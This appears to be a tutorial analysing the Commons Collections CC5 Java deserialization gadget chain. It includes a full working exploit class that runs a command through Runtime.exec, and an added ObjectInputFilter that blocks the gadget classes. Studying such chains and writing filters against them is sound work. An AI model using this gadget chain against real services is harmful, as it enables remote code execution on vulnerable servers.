CC5 Chain

CC5

The second half of CC5 is the same as in the earlier chains; the only difference is that LazyMap's get method is now reached through TiedMapEntry's toString method, which effectively provides a new entry point.

CC5 Attack Chain Analysis

Calling get

Here TiedMapEntry's toString method calls getValue, and getValue in turn calls the wrapped map's get method:

```java
// TiedMapEntry toString
public String toString() {
    return getKey() + "=" + getValue();
}

// getValue delegates to the wrapped map, so a LazyMap runs its transformer here
public Object getValue() {
    return map.get(key);
}
```

So we only need to put the lazyMap into a TiedMapEntry and then call its toString method:

```java
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 1);
```

Calling toString

The readObject method of BadAttributeValueExpException calls the toString method of the stored val object (when no SecurityManager is installed, as the check below shows). This step is very simple: we only need to pass the TiedMapEntry into BadAttributeValueExpException.

```java
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    Object valObj = gf.get("val", null);

    if (valObj == null) {
        val = null;
    } else if (valObj instanceof String) {
        val = valObj;
    } else if (System.getSecurityManager() == null
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) {
        // Without a SecurityManager, any deserialized object reaches this toString call
        val = valObj.toString();
    } else { // the serialized object is from a version without JDK-8019292 fix
        val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
    }
}
```

The final code is as follows:

```java
import java.io.*;
import java.util.HashMap;
import java.util.Map;
import javax.management.BadAttributeValueExpException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

public class CC5 {
    public static void main(String[] args) throws Exception {
        // Same transformer chain as the earlier CC chains: Runtime.getRuntime().exec("calc")
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(map, chainedTransformer);
        // New entry point: TiedMapEntry.toString() -> getValue() -> lazyMap.get(1)
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, 1);
        // BadAttributeValueExpException.readObject() calls val.toString() during deserialization
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);
        serialize(badAttributeValueExpException);
        unserialize("ser.bin");
    }

    // serialize/unserialize helpers are not shown in the original post; standard file-based versions
    public static void serialize(Object obj) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }
}
```
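Added example (not part of the original post, and not JDK or Commons Collections code): the receiving-side counterpart to the entry point analysed above. A JEP 290 ObjectInputFilter (java.io.ObjectInputFilter, Java 9+) rejects BadAttributeValueExpException and the Commons Collections classes this chain is built from before their readObject runs, so TiedMapEntry.toString and the LazyMap transformer are never reached; the class name, the BLOCKED_PREFIXES list, the depth limit and the readFiltered helper are assumptions chosen for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.util.Set;

// Added example: a receiving-side ObjectInputFilter (JEP 290, Java 9+) that
// blocks the classes CC5 relies on before any of their readObject methods run.
public class Cc5DeserializationFilter {

    // Assumed block list: the CC5 entry point plus the Commons Collections 3
    // gadget classes from the chain above. Prefixes so related classes match too.
    private static final Set<String> BLOCKED_PREFIXES = Set.of(
        "javax.management.BadAttributeValueExpException",
        "org.apache.commons.collections.functors.",   // Constant/Invoker/ChainedTransformer
        "org.apache.commons.collections.map.LazyMap",
        "org.apache.commons.collections.keyvalue.TiedMapEntry"
    );

    // REJECTED for a blocked class or an over-deep graph; UNDECIDED otherwise so a
    // stricter application allow-list filter can still make the final decision.
    static ObjectInputFilter.Status check(ObjectInputFilter.FilterInfo info) {
        if (info.depth() > 20) {            // assumed limit: gadget graphs nest deeply
            return ObjectInputFilter.Status.REJECTED;
        }
        Class<?> clazz = info.serialClass();
        if (clazz == null) {                // no class descriptor in this callback
            return ObjectInputFilter.Status.UNDECIDED;
        }
        String name = clazz.getName();
        for (String prefix : BLOCKED_PREFIXES) {
            if (name.startsWith(prefix)) {
                return ObjectInputFilter.Status.REJECTED;
            }
        }
        return ObjectInputFilter.Status.UNDECIDED;
    }

    // Assumed helper: deserialize a byte[] with the filter installed. A rejected class
    // surfaces as java.io.InvalidClassException before BadAttributeValueExpException's
    // readObject, and therefore TiedMapEntry.toString, is ever invoked.
    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (InputStream in = new ByteArrayInputStream(data);
             ObjectInputStream ois = new ObjectInputStream(in)) {
            ois.setObjectInputFilter(Cc5DeserializationFilter::check);
            return ois.readObject();
        }
    }
}
```

Feeding the ser.bin produced by the listing above through readFiltered ends in an InvalidClassException at the BadAttributeValueExpException descriptor, which is also the event worth logging on the receiving side.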